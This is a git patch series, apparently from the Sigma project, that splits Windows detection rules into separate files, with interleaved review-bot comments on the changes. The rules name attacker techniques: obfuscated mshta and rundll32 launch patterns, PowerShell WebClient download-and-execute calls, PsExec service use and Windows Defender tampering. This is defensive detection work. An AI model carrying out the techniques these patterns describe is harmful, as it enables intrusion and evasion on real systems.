a/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services_security.yml index 6f66d4fd..ddbafaf9 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services_security.yml 
@@ -22,7 +22,7 @@ detection: selection_eventid: EventID: 4697 selection: - ImagePath|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' + ServiceFileName|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' condition: selection and selection_eventid falsepositives: - Unknown diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services_security.yml index 18e9fb4e..7eb17b8b 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services_security.yml @@ -22,7 +22,7 @@ detection: selection_eventid: EventID: 4697 selection: - ImagePath|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' + ServiceFileName|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' condition: selection and selection_eventid falsepositives: - Unknown diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_var++_services_security.yml index 51bbebc9..e2650e7d 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_var++_services_security.yml @@ -22,7 +22,7 @@ detection: selection_eventid: EventID: 4697 selection: - ImagePath|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r + ServiceFileName|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r condition: selection and selection_eventid falsepositives: - Unknown From 79d22dde5879c2e25ef6bc4979a5a0705aad95df Mon Sep 17 00:00:00 2001 
From: frack113
Date: Mon, 20 Sep 2021 22:56:13 +0200
Subject: [PATCH 0999/1367] split global win_invoke_obfuscation_*
---
 ..._load_invoke_obfuscation_var+_services.yml | 28 +++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 rules-unsupported/driver_load_invoke_obfuscation_var+_services.yml
diff --git a/rules-unsupported/driver_load_invoke_obfuscation_var+_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_var+_services.yml
new file mode 100644
index 00000000..2619bc83
--- /dev/null
+++ b/rules-unsupported/driver_load_invoke_obfuscation_var+_services.yml
@@ -0,0 +1,28 @@
+title: Invoke-Obfuscation VAR+ Launcher
+id: 3e27b010-2cf2-4577-8ef0-3ea44aaea0dc
+related:
+ - id: 8ca7004b-e620-4ecb-870e-86129b5b8e75
+ type: derived
+description: Detects Obfuscated use of Environment Variables to execute PowerShell
+status: experimental
+author: Jonathan Cheong, oscd.community
+date: 2020/10/15
+modified: 2021/09/17
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009 #(Task 24)
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ product: windows
+ category: driver_load
+detection:
+ selection:
+ ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
+
From 95af26f9635a6f2edae40fceb1582a4c3e7421c6 Mon Sep 17 00:00:00 2001
From: frack113
Date: Tue, 21 Sep 2021 09:46:02 +0200
Subject: [PATCH 1000/1367] split powershell_suspicious_download.yml
---
 ...powershell_classic_suspicious_download.yml | 33 +++++++++++++++++++
 .../powershell_suspicious_download.yml | 30 +++-------------
 2 files changed, 38 insertions(+), 25 deletions(-)
 create mode 100644 rules/windows/powershell/powershell_classic_suspicious_download.yml
diff --git a/rules/windows/powershell/powershell_classic_suspicious_download.yml b/rules/windows/powershell/powershell_classic_suspicious_download.yml
new file mode 100644
index 00000000..5560edef
--- /dev/null
+++ b/rules/windows/powershell/powershell_classic_suspicious_download.yml
@@ -0,0 +1,33 @@
+title: Suspicious PowerShell Download
+id: 3236fcd0-b7e3-4433-b4f8-86ad61a9af2d
+related:
+ - id: 65531a81-a694-4e31-ae04-f8ba5bc33759
+ type: derived
+status: experimental
+description: Detects suspicious PowerShell download command
+tags:
+ - attack.execution
+ - attack.t1059.001
+ - attack.t1086 #an old one
+author: Florian Roth
+date: 2017/03/05
+modified: 2021/09/21
+logsource:
+ product: windows
+ service: powershell-classic
+ definition: fields have to be extract from event
+detection:
+ downloadfile:
+ EventID: 400 # get 400 ,403 and 600 for 1 execution
+ HostApplication|contains|all:
+ - 'System.Net.WebClient'
+ - '.DownloadFile('
+ downloadstring:
+ EventID: 400
+ HostApplication|contains|all:
+ - 'System.Net.WebClient'
+ - '.DownloadString('
+ condition: downloadfile or downloadstring
+falsepositives:
+ - PowerShell scripts that download content from the Internet
+level: medium
\ No newline at end of file
diff --git a/rules/windows/powershell/powershell_suspicious_download.yml b/rules/windows/powershell/powershell_suspicious_download.yml
index 4870c05b..703141c7 100644
--- a/rules/windows/powershell/powershell_suspicious_download.yml
+++ b/rules/windows/powershell/powershell_suspicious_download.yml
@@ -1,5 +1,5 @@
-action: global
 title: Suspicious PowerShell Download
+id: 65531a81-a694-4e31-ae04-f8ba5bc33759
 status: experimental
 description: Detects suspicious PowerShell download command
 tags:
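Review bot: The two selections in the new classic rule each repeat `EventID: 400` and `'System.Net.WebClient'` and differ only in the method name, so a change to one half is easy to forget in the other; the logic is `EventID 400 and WebClient and (DownloadFile or DownloadString)`, which factors into the same two-selection shape the modern sibling already uses (`condition: webclient and download` is visible in the L1688 context). Both halves of the split also keep the identical title `Suspicious PowerShell Download`, so alerts from the two rules cannot be told apart by title in a console; a constructed suffix such as `Suspicious PowerShell Download (Classic)` would disambiguate, and the same applies to the splits in L1689 and L1692. The `# get 400 ,403 and 600 for 1 execution` comment is worth keeping next to the EventID as it explains why only 400 is matched.
```yaml
detection:
  webclient:
    EventID: 400 # get 400 ,403 and 600 for 1 execution
    HostApplication|contains: 'System.Net.WebClient'
  download:
    HostApplication|contains:
      - '.DownloadFile('
      - '.DownloadString('
  condition: webclient and download
# … unchanged: falsepositives, level …
```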
@@ -8,12 +8,7 @@ tags: - attack.t1086 #an old one author: Florian Roth date: 2017/03/05 -modified: 2021/07/20 -falsepositives: - - PowerShell scripts that download content from the Internet -level: medium ---- -id: 65531a81-a694-4e31-ae04-f8ba5bc33759 +modified: 2021/09/21 logsource: product: windows service: powershell @@ -24,21 +19,6 @@ detection: - '.DownloadFile(' - '.DownloadString(' condition: webclient and download ---- -id: 3236fcd0-b7e3-4433-b4f8-86ad61a9af2d -logsource: - product: windows - service: powershell-classic - definition: fields have to be extract from event -detection: - downloadfile: - EventID: 400 # get 400 ,403 and 600 for 1 execution - HostApplication|contains|all: - - 'System.Net.WebClient' - - '.DownloadFile(' - downloadstring: - EventID: 400 - HostApplication|contains|all: - - 'System.Net.WebClient' - - '.DownloadString(' - condition: downloadfile or downloadstring \ No newline at end of file +falsepositives: + - PowerShell scripts that download content from the Internet +level: medium \ No newline at end of file From f5d58a0cb15726ef95a7173fe1257ae9b655290f Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 09:48:50 +0200 Subject: [PATCH 1001/1367] split powershell_remote_powershell_session.yml --- ...hell_classic_remote_powershell_session.yml | 32 +++++++++++++++++++ .../powershell_remote_powershell_session.yml | 24 +++----------- 2 files changed, 37 insertions(+), 19 deletions(-) create mode 100644 rules/windows/powershell/powershell_classic_remote_powershell_session.yml diff --git a/rules/windows/powershell/powershell_classic_remote_powershell_session.yml b/rules/windows/powershell/powershell_classic_remote_powershell_session.yml new file mode 100644 index 00000000..d720d95d --- /dev/null +++ b/rules/windows/powershell/powershell_classic_remote_powershell_session.yml 
@@ -0,0 +1,32 @@ +title: Remote PowerShell Session +id: 60167e5c-84b2-4c95-a7ac-86281f27c445 +related: + - id: 96b9f619-aa91-478f-bacb-c3e50f8df575 + type: derived +description: Detects remote PowerShell sessions +status: test +date: 2019/08/10 +modified: 2021/09/21 +author: Roberto Rodriguez @Cyb3rWard0g +references: + - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html +tags: + - attack.execution + - attack.t1059.001 + - attack.t1086 # an old one + - attack.lateral_movement + - attack.t1021.006 + - attack.t1028 # an old one +logsource: + product: windows + service: powershell-classic + definition: fields have to be extract from event +detection: + selection: + EventID: 400 + HostName: 'ServerRemoteHost' + HostApplication|contains: 'wsmprovhost.exe' + condition: selection +falsepositives: + - Legitimate use remote PowerShell sessions +level: high \ No newline at end of file diff --git a/rules/windows/powershell/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_remote_powershell_session.yml index 429a623b..146af6e5 100644 --- a/rules/windows/powershell/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_remote_powershell_session.yml @@ -1,9 +1,9 @@ -action: global title: Remote PowerShell Session +id: 96b9f619-aa91-478f-bacb-c3e50f8df575 description: Detects remote PowerShell sessions status: test date: 2019/08/10 -modified: 2020/08/24 +modified: 2021/09/21 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html @@ -14,11 +14,6 @@ tags: - attack.lateral_movement - attack.t1021.006 - attack.t1028 # an old one -falsepositives: - - Legitimate use remote PowerShell sessions -level: high ---- -id: 96b9f619-aa91-478f-bacb-c3e50f8df575 logsource: product: windows service: powershell 
@@ -30,15 +25,6 @@ detection: - ' = ServerRemoteHost ' # HostName: 'ServerRemoteHost' french : Nom d’hôte = - 'wsmprovhost.exe' # HostApplication|contains: 'wsmprovhost.exe' french Application hôte = condition: selection ---- -id: 60167e5c-84b2-4c95-a7ac-86281f27c445 -logsource: - product: windows - service: powershell-classic - definition: fields have to be extract from event -detection: - selection: - EventID: 400 - HostName: 'ServerRemoteHost' - HostApplication|contains: 'wsmprovhost.exe' - condition: selection +falsepositives: + - Legitimate use remote PowerShell sessions +level: high \ No newline at end of file From 0a6ac0b171f355f4b93e9e84d2525ec49e1c8d80 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 09:52:35 +0200 Subject: [PATCH 1002/1367] split global powershell_alternate_powershell_hosts.yml --- .../powershell_alternate_powershell_hosts.yml | 29 ++++------------- ...ell_classic_alternate_powershell_hosts.yml | 32 +++++++++++++++++++ 2 files changed, 39 insertions(+), 22 deletions(-) create mode 100644 rules/windows/powershell/powershell_classic_alternate_powershell_hosts.yml diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml index 58cad683..d3ce9723 100644 --- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml @@ -1,9 +1,9 @@ -action: global title: Alternate PowerShell Hosts +id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: test date: 2019/08/11 -modified: 2021/08/28 +modified: 2021/09/21 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html 
@@ -11,13 +11,6 @@ tags:
 - attack.execution
 - attack.t1059.001
 - attack.t1086 # an old one
-falsepositives:
- - Programs using PowerShell directly without invocation of a dedicated interpreter
- - MSP Detection Searcher
- - Citrix ConfigSync.ps1
-level: medium
----
-id: 64e8e417-c19a-475a-8d19-98ea705394cc
 logsource:
 product: windows
 service: powershell
@@ -29,16 +22,8 @@ detection:
 filter:
 ContextInfo|contains: 'powershell.exe' # Host Application=...powershell.exe or Application hote=...powershell.exe in French Win10 event
 condition: selection and not filter
----
-id: d7326048-328b-4d5e-98af-86e84b17c765
-logsource:
- product: windows
- service: powershell-classic
- definition: fields have to be extract from event
-detection:
- selection:
- EventID: 400
- HostApplication: '*'
- filter:
- HostApplication|startswith: 'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe'
- condition: selection and not filter
\ No newline at end of file
+falsepositives:
+ - Programs using PowerShell directly without invocation of a dedicated interpreter
+ - MSP Detection Searcher
+ - Citrix ConfigSync.ps1
+level: medium
\ No newline at end of file
diff --git a/rules/windows/powershell/powershell_classic_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_classic_alternate_powershell_hosts.yml
new file mode 100644
index 00000000..154ddfde
--- /dev/null
+++ b/rules/windows/powershell/powershell_classic_alternate_powershell_hosts.yml
@@ -0,0 +1,32 @@
+title: Alternate PowerShell Hosts
+id: d7326048-328b-4d5e-98af-86e84b17c765
+related:
+ - id: 64e8e417-c19a-475a-8d19-98ea705394cc
+ type: derived
+description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
+status: test
+date: 2019/08/11
+modified: 2021/09/21
+author: Roberto Rodriguez @Cyb3rWard0g
+references:
+ - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html
+tags:
+ - attack.execution
+ - attack.t1059.001
+ - attack.t1086 # an old one
+logsource:
+ product: windows
+ service: powershell-classic
+ definition: fields have to be extract from event
+detection:
+ selection:
+ EventID: 400
+ HostApplication: '*'
+ filter:
+ HostApplication|startswith: 'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe'
+ condition: selection and not filter
+falsepositives:
+ - Programs using PowerShell directly without invocation of a dedicated interpreter
+ - MSP Detection Searcher
+ - Citrix ConfigSync.ps1
+level: medium
\ No newline at end of file
From a96dd66b46cdcc4f3be84b207c1e3ad9f11211e7 Mon Sep 17 00:00:00 2001
From: frack113
Date: Tue, 21 Sep 2021 09:56:03 +0200
Subject: [PATCH 1003/1367] split global win_wmi_persistence.yml
---
 .../other/win_security_wmi_persistence.yml | 30 +++++++++++++++++++
 rules/windows/other/win_wmi_persistence.yml | 23 ++++----------
 2 files changed, 35 insertions(+), 18 deletions(-)
 create mode 100644 rules/windows/other/win_security_wmi_persistence.yml
diff --git a/rules/windows/other/win_security_wmi_persistence.yml b/rules/windows/other/win_security_wmi_persistence.yml
new file mode 100644
index 00000000..514a0ca9
--- /dev/null
+++ b/rules/windows/other/win_security_wmi_persistence.yml
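Review bot: The `filter` in the new classic rule excludes only `HostApplication` values starting with `C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe`, while `HostApplication: '*'` selects every EventID 400, so a 32-bit host under SysWOW64, a non-default system drive, or pwsh would presumably be reported as an "alternate host" even though none of those is listed under `falsepositives`. If that is intended, say so in `falsepositives`; otherwise a path-agnostic filter such as `HostApplication|contains: '\WindowsPowerShell\v1.0\powershell.exe'` would be narrower in effect. Whether `startswith` compares case-insensitively also depends on the backend, which is worth a comment given the mixed-case `C:\WINDOWS` literal. The companion powershell rule above uses the looser `ContextInfo|contains: 'powershell.exe'`, so the two split rules now differ in strictness.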
@@ -0,0 +1,30 @@
+title: WMI Persistence
+id: f033f3f3-fd24-4995-97d8-a3bb17550a88
+related:
+ - id: 0b7889b4-5577-4521-a60a-3376ee7f9f7b
+ type: derived
+status: experimental
+description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
+author: Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community
+date: 2017/08/22
+modified: 2021/09/21
+references:
+ - https://twitter.com/mattifestation/status/899646620148539397
+ - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
+tags:
+ - attack.persistence
+ - attack.privilege_escalation
+ - attack.t1084 # an old one
+ - attack.t1546.003
+logsource:
+ product: windows
+ service: security
+detection:
+ wmi_subscription:
+ EventID: 4662
+ ObjectType: 'WMI Namespace'
+ ObjectName|contains: 'subscription'
+ condition: wmi_subscription
+falsepositives:
+ - Unknown (data set is too small; further testing needed)
+level: medium
\ No newline at end of file
diff --git a/rules/windows/other/win_wmi_persistence.yml b/rules/windows/other/win_wmi_persistence.yml
index 38819f13..dcb47cae 100644
--- a/rules/windows/other/win_wmi_persistence.yml
+++ b/rules/windows/other/win_wmi_persistence.yml
@@ -1,10 +1,10 @@
-action: global
 title: WMI Persistence
+id: 0b7889b4-5577-4521-a60a-3376ee7f9f7b
 status: experimental
 description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
 author: Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community
 date: 2017/08/22
-modified: 2020/10/13
+modified: 2021/09/21
 references:
 - https://twitter.com/mattifestation/status/899646620148539397
 - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
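Review bot: The new security-log rule keys on EventID 4662 with `ObjectType: 'WMI Namespace'`, and 4662 is only emitted when an audit SACL has been configured on the object being accessed, so on a default install this rule is silent rather than wrong. That prerequisite belongs in the rule now that it stands alone, e.g. `definition: Requires an audit SACL on the WMI namespace(s) so that 4662 object-access events are generated` under `logsource`. The `description` still speaks of "event filter and command line event consumer based on WMI and Security Logs", which describes the former global rule rather than this security-only variant.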
@@ -13,11 +13,6 @@ tags:
 - attack.privilege_escalation
 - attack.t1084 # an old one
 - attack.t1546.003
-falsepositives:
- - Unknown (data set is too small; further testing needed)
-level: medium
----
-id: 0b7889b4-5577-4521-a60a-3376ee7f9f7b
 logsource:
 product: windows
 service: wmi #native windows detection
@@ -33,14 +28,6 @@ detection:
 wmi_filter_registration:
 EventID: 5859
 condition: (wmi_filter_to_consumer_binding and consumer_keywords) or (wmi_filter_registration)
----
-id: f033f3f3-fd24-4995-97d8-a3bb17550a88
-logsource:
- product: windows
- service: security
-detection:
- wmi_subscription:
- EventID: 4662
- ObjectType: 'WMI Namespace'
- ObjectName|contains: 'subscription'
- condition: wmi_subscription
\ No newline at end of file
+falsepositives:
+ - Unknown (data set is too small; further testing needed)
+level: medium
\ No newline at end of file
From 318f8b714e5cd01f63e1a5f3f49c37bc3741adbf Mon Sep 17 00:00:00 2001
From: frack113
Date: Tue, 21 Sep 2021 10:10:48 +0200
Subject: [PATCH 1004/1367] split global win_tool_psexec.yml
---
 .../file_event/file_event_tool_psexec.yml | 36 ++++++++++++++++
 rules/windows/other/win_tool_psexec.yml | 42 +++----------------
 .../pipe_created/pipe_created_tool_psexec.yml | 36 ++++++++++++++++
 .../process_creation_tool_psexec.yml | 38 +++++++++++++++++
 4 files changed, 116 insertions(+), 36 deletions(-)
 create mode 100644 rules/windows/file_event/file_event_tool_psexec.yml
 create mode 100644 rules/windows/pipe_created/pipe_created_tool_psexec.yml
 create mode 100644 rules/windows/process_creation/process_creation_tool_psexec.yml
diff --git a/rules/windows/file_event/file_event_tool_psexec.yml b/rules/windows/file_event/file_event_tool_psexec.yml
new file mode 100644
index 00000000..91a51e0a
--- /dev/null
+++ b/rules/windows/file_event/file_event_tool_psexec.yml
@@ -0,0 +1,36 @@
+title: PsExec Tool Execution
+id: 259e5a6a-b8d2-4c38-86e2-26c5e651361d
+related:
+ - id: 42c575ea-e41e-41f1-b248-8093c3e82a28
+ type: derived
+status: experimental
+description: Detects PsExec service installation and execution events (service and Sysmon)
+author: Thomas Patzke
+date: 2017/06/12
+modified: 2021/09/21
+references:
+ - https://www.jpcert.or.jp/english/pub/sr/ir_research.html
+ - https://jpcertcc.github.io/ToolAnalysisResultSheet
+tags:
+ - attack.execution
+ - attack.t1035 # an old one
+ - attack.t1569.002
+ - attack.s0029
+fields:
+ - EventID
+ - CommandLine
+ - ParentCommandLine
+ - ServiceName
+ - ServiceFileName
+ - TargetFilename
+ - PipeName
+logsource:
+ category: file_event
+ product: windows
+detection:
+ sysmon_filecreation:
+ TargetFilename|endswith: '\PSEXESVC.exe'
+ condition: sysmon_filecreation
+falsepositives:
+ - unknown
+level: low
\ No newline at end of file
diff --git a/rules/windows/other/win_tool_psexec.yml b/rules/windows/other/win_tool_psexec.yml
index 60f46fc5..3528eaae 100644
--- a/rules/windows/other/win_tool_psexec.yml
+++ b/rules/windows/other/win_tool_psexec.yml
@@ -1,10 +1,10 @@
-action: global
 title: PsExec Tool Execution
+id: 42c575ea-e41e-41f1-b248-8093c3e82a28
 status: experimental
 description: Detects PsExec service installation and execution events (service and Sysmon)
 author: Thomas Patzke
 date: 2017/06/12
-modified: 2021/08/26
+modified: 2021/09/21
 references:
 - https://www.jpcert.or.jp/english/pub/sr/ir_research.html
 - https://jpcertcc.github.io/ToolAnalysisResultSheet
@@ -13,8 +13,6 @@ tags:
 - attack.t1035 # an old one
 - attack.t1569.002
 - attack.s0029
-detection:
- condition: 1 of them
 fields:
 - EventID
 - CommandLine
@@ -23,11 +21,6 @@ fields:
 - ServiceFileName
 - TargetFilename
 - PipeName
-falsepositives:
- - unknown
-level: low
----
-id: 42c575ea-e41e-41f1-b248-8093c3e82a28
 logsource:
 product: windows
 service: system
@@ -39,30 +32,7 @@ detection:
 service_execution:
 EventID: 7036
 ServiceName: 'PSEXESVC'
----
-id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba
-logsource:
- category: process_creation
- product: windows
-detection:
- sysmon_processcreation:
- Image|endswith: '\PSEXESVC.exe'
- User|startswith:
- - 'NT AUTHORITY\SYSTEM'
- - 'AUTORITE NT\Sys' # French language settings
----
-id: f3f3a972-f982-40ad-b63c-bca6afdfad7c
-logsource:
- category: pipe_created
- product: windows
-detection:
- sysmon_pipecreated:
- PipeName: '\PSEXESVC'
----
-id: 259e5a6a-b8d2-4c38-86e2-26c5e651361d
-logsource:
- category: file_event
- product: windows
-detection:
- sysmon_filecreation:
- TargetFilename|endswith: '\PSEXESVC.exe'
+ condition: service_installation or service_execution
+falsepositives:
+ - unknown
+level: low
\ No newline at end of file
diff --git a/rules/windows/pipe_created/pipe_created_tool_psexec.yml b/rules/windows/pipe_created/pipe_created_tool_psexec.yml
new file mode 100644
index 00000000..b662d0ef
--- /dev/null
+++ b/rules/windows/pipe_created/pipe_created_tool_psexec.yml
@@ -0,0 +1,36 @@
+title: PsExec Tool Execution
+id: f3f3a972-f982-40ad-b63c-bca6afdfad7c
+related:
+ - id: 42c575ea-e41e-41f1-b248-8093c3e82a28
+ type: derived
+status: experimental
+description: Detects PsExec service installation and execution events (service and Sysmon)
+author: Thomas Patzke
+date: 2017/06/12
+modified: 2021/09/21
+references:
+ - https://www.jpcert.or.jp/english/pub/sr/ir_research.html
+ - https://jpcertcc.github.io/ToolAnalysisResultSheet
+tags:
+ - attack.execution
+ - attack.t1035 # an old one
+ - attack.t1569.002
+ - attack.s0029
+fields:
+ - EventID
+ - CommandLine
+ - ParentCommandLine
+ - ServiceName
+ - ServiceFileName
+ - TargetFilename
+ - PipeName
+logsource:
+ category: pipe_created
+ product: windows
+detection:
+ sysmon_pipecreated:
+ PipeName: '\PSEXESVC'
+ condition: sysmon_pipecreated
+falsepositives:
+ - unknown
+level: low
\ No newline at end of file
diff --git a/rules/windows/process_creation/process_creation_tool_psexec.yml b/rules/windows/process_creation/process_creation_tool_psexec.yml
new file mode 100644
index 00000000..a352369a
--- /dev/null
+++ b/rules/windows/process_creation/process_creation_tool_psexec.yml
@@ -0,0 +1,38 @@
+title: PsExec Tool Execution
+id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba
+related:
+ - id: 42c575ea-e41e-41f1-b248-8093c3e82a28
+ type: derived
+status: experimental
+description: Detects PsExec service installation and execution events (service and Sysmon)
+author: Thomas Patzke
+date: 2017/06/12
+modified: 2021/09/21
+references:
+ - https://www.jpcert.or.jp/english/pub/sr/ir_research.html
+ - https://jpcertcc.github.io/ToolAnalysisResultSheet
+tags:
+ - attack.execution
+ - attack.t1035 # an old one
+ - attack.t1569.002
+ - attack.s0029
+
+fields:
+ - EventID
+ - CommandLine
+ - ParentCommandLine
+ - ServiceName
+ - ServiceFileName
+ - TargetFilename
+ - PipeName
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ sysmon_processcreation:
+ Image|endswith: '\PSEXESVC.exe'
+ User|startswith: 'NT AUTHORITY\SYSTEM'
+ condition: sysmon_processcreation
+falsepositives:
+ - unknown
+level: low
\ No newline at end of file
From 2b23118b0d01f9de2a459290e897ea707a48f7db Mon Sep 17 00:00:00 2001
From: frack113
Date: Tue, 21 Sep 2021 10:16:25 +0200
Subject: [PATCH 1005/1367] split global win_defender_exclusions.yml
---
 .../windows/other/win_defender_exclusions.yml | 21 ++++----------
 .../registry_event_defender_exclusions.yml | 28 +++++++++++++++++++
 2 files changed, 33 insertions(+), 16 deletions(-)
 create mode 100644 rules/windows/registry_event/registry_event_defender_exclusions.yml
diff --git a/rules/windows/other/win_defender_exclusions.yml b/rules/windows/other/win_defender_exclusions.yml
index 5021ed75..3862ad15 100644
--- a/rules/windows/other/win_defender_exclusions.yml
+++ b/rules/windows/other/win_defender_exclusions.yml
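Review bot: The new process_creation rule narrows `User|startswith` to the single value `'NT AUTHORITY\SYSTEM'`, dropping the `'AUTORITE NT\Sys'` alternative that the removed global rule carried for French-language systems (see the removed lines of the win_tool_psexec.yml hunk above); that is a coverage regression the "split" commit message does not announce. Restoring the list form `User|startswith:` / ` - 'NT AUTHORITY\SYSTEM'` / ` - 'AUTORITE NT\Sys' # French language settings` keeps the previous behaviour. Separately, the `fields` list copied into each of the three new files still names `ServiceName`, `ServiceFileName`, `TargetFilename` and `PipeName`, none of which exist on a process creation event, so trimming it per logsource would make the enrichment output meaningful. The stray blank line after `- attack.s0029` is cosmetic.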
@@ -1,7 +1,8 @@
-action: global
 title: Windows Defender Exclusions Added
+id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f
 description: Detects the Setting of Windows Defender Exclusions
 date: 2021/07/06
+modified: 2021/09/21
 author: Christian Burkard
 references:
 - https://twitter.com/_nullbind/status/1204923340810543109
@@ -10,11 +11,6 @@ tags:
 - attack.defense_evasion
 - attack.t1089 # an old one
 - attack.t1562.001
-falsepositives:
- - Administrator actions
-level: medium
----
-id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f
 logsource:
 product: windows
 service: windefend
@@ -23,13 +19,6 @@ detection:
 EventID: 5007
 New Value|contains: '\Microsoft\Windows Defender\Exclusions'
 condition: selection1
----
-id: a982fc9c-6333-4ffb-a51d-addb04e8b529
-logsource:
- product: windows
- category: registry_event
-detection:
- selection2:
- EventID: 13
- TargetObject|contains: '\Microsoft\Windows Defender\Exclusions'
- condition: selection2
+falsepositives:
+ - Administrator actions
+level: medium
\ No newline at end of file
diff --git a/rules/windows/registry_event/registry_event_defender_exclusions.yml b/rules/windows/registry_event/registry_event_defender_exclusions.yml
new file mode 100644
index 00000000..1840ff84
--- /dev/null
+++ b/rules/windows/registry_event/registry_event_defender_exclusions.yml
@@ -0,0 +1,28 @@
+title: Windows Defender Exclusions Added
+id: a982fc9c-6333-4ffb-a51d-addb04e8b529
+related:
+ - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f
+ type: derived
+description: Detects the Setting of Windows Defender Exclusions
+date: 2021/07/06
+modified: 2021/09/21
+author: Christian Burkard
+references:
+ - https://twitter.com/_nullbind/status/1204923340810543109
+status: test
+tags:
+ - attack.defense_evasion
+ - attack.t1089 # an old one
+ - attack.t1562.001
+logsource:
+ product: windows
+ category: registry_event
+detection:
+ selection2:
+ #EventID: 13
+ EventType: SetValue
+ TargetObject|contains: '\Microsoft\Windows Defender\Exclusions'
+ condition: selection2
+falsepositives:
+ - Administrator actions
+level: medium
\ No newline at end of file
From c0e24e9236127586412b9e85fe5358484cca0302 Mon Sep 17 00:00:00 2001
From: frack113
Date: Tue, 21 Sep 2021 10:24:52 +0200
Subject: [PATCH 1006/1367] split global win_defender_disabled.yml
---
 rules/windows/other/win_defender_disabled.yml | 43 +++----------------
 .../other/win_system_defender_disabled.yml | 30 +++++++++++++
 .../registry_event_defender_disabled.yml | 35 +++++++++++++++
 3 files changed, 71 insertions(+), 37 deletions(-)
 create mode 100644 rules/windows/other/win_system_defender_disabled.yml
 create mode 100644 rules/windows/registry_event/registry_event_defender_disabled.yml
diff --git a/rules/windows/other/win_defender_disabled.yml b/rules/windows/other/win_defender_disabled.yml
index 4c7ec817..14063f75 100644
--- a/rules/windows/other/win_defender_disabled.yml
+++ b/rules/windows/other/win_defender_disabled.yml
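Review bot: `#EventID: 13` is a commented-out field left inside `selection2`; a commented selection field reads as if it were still active and tends to be carried forward by copy-paste, so it should be dropped now that `EventType: SetValue` expresses the same intent through the generic `registry_event` logsource. If the Sysmon event id is worth remembering, record it in a `definition:` under `logsource` rather than in the detection block. The swap from `EventID: 13` to `EventType: SetValue` is also a semantic change relative to the removed global rule that the "split" commit message does not mention.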
@@ -1,8 +1,8 @@
-action: global
 title: Windows Defender Threat Detection Disabled
+id: fe34868f-6e0e-4882-81f6-c43aa8f15b62
 description: Detects disabling Windows Defender threat protection
 date: 2020/07/28
-modified: 2021/07/05
+modified: 2021/09/21
 author: Ján Trenčanský, frack113
 references:
 - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus
@@ -12,11 +12,6 @@ tags:
 - attack.defense_evasion
 - attack.t1089 # an old one
 - attack.t1562.001
-falsepositives:
- - Administrator actions
-level: high
----
-id: fe34868f-6e0e-4882-81f6-c43aa8f15b62
 logsource:
 product: windows
 service: windefend
@@ -27,33 +22,7 @@ detection:
 - 5010
 - 5012
 - 5101
- selection2:
- TargetObject:
- - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend
